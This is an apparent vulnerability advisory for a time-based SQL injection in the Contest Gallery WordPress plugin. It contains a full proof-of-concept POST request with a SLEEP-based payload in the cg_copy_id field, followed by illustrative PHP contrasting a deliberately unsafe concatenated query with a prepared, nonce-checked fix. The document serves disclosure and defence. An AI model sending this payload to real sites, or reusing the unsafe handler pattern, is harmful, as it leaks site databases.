wpexploit
Daniel Krohmer
WPEX-ID: 813DE343-4814-42B8-B8DF-1695320512CD
History: Dec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Author+ SQL Injection

2022-12-05 00:00:00
Daniel Krohmer
Tags: sql injection, post request, wordpress plugin

EPSS: 0.001
Percentile: 36.8%

The plugin does not escape the cg_copy_id POST parameter before concatenating it into an SQL query in cg-copy-comments.php and cg-copy-rating.php. This may allow malicious users with at least author privileges to leak sensitive information from the site's database.

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------57928068830176656773670049687
Content-Length: 1508
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7C6333e4fa1fc3f8961218830b63c9910e36a1507d9530ee857dda65208e7bd3bf; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7Cd34e5c9317c939593831376a9467f195ca7e97151d2f965acdbc84aeb291c5b7; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_type"

cg_copy_type_all
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_id"

1 AND (SELECT 7394 FROM (SELECT(SLEEP(2)))UrUZ)
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_start"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="option_id_next_gallery"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="id_to_copy"

1
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="edit_gallery_hidden_post"


-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="copy_v7"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="page"

contest-gallery/index.php
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------57928068830176656773670049687--
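The defect class the advisory describes, as an added illustration that is not the Contest Gallery plugin's own code: a handler that concatenates the raw cg_copy_id value into SQL, beside a hardened version that uses WordPress's $wpdb->prepare(). The table name cg_comments, the column gallery_id, the nonce action cg_copy_action and the nonce field cg_copy_nonce are assumptions.

```php
<?php
// Illustrative only: not the plugin's code. It models the defect class the
// advisory describes (a POST parameter concatenated into SQL) and the fix
// WordPress provides. Table, column and nonce names are assumptions.

// Vulnerable pattern: the raw parameter is interpolated into the query, so a
// value such as "1 AND (SELECT SLEEP(2))" becomes part of the SQL statement
// and the server's response time leaks the result of the injected condition.
function cg_copy_comments_unsafe( $wpdb ) {
    $copy_id = $_POST['cg_copy_id'];
    $sql     = "SELECT * FROM {$wpdb->prefix}cg_comments WHERE gallery_id = " . $copy_id;
    return $wpdb->get_results( $sql );
}

// Hardened pattern:
//  1. require a capability and a valid nonce for the AJAX action;
//  2. coerce the identifier to a non-negative integer with absint(), so the
//     payload above collapses to the integer 1;
//  3. bind it through $wpdb->prepare() with a %d placeholder, so the value
//     can never change the structure of the statement.
function cg_copy_comments_safe( $wpdb ) {
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // Assumed nonce action and field names (not taken from the plugin).
    check_ajax_referer( 'cg_copy_action', 'cg_copy_nonce' );

    $copy_id = isset( $_POST['cg_copy_id'] )
        ? absint( wp_unslash( $_POST['cg_copy_id'] ) )
        : 0;
    if ( 0 === $copy_id ) {
        wp_send_json_error( 'invalid gallery id', 400 );
    }

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}cg_comments WHERE gallery_id = %d",
        $copy_id
    );
    return $wpdb->get_results( $sql );
}
```

For detection, the unsafe form is recognisable in code review by the `.` concatenation of request data into a query string; any $wpdb call whose SQL is built that way, rather than through prepare() with %d/%s placeholders, warrants the same fix.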
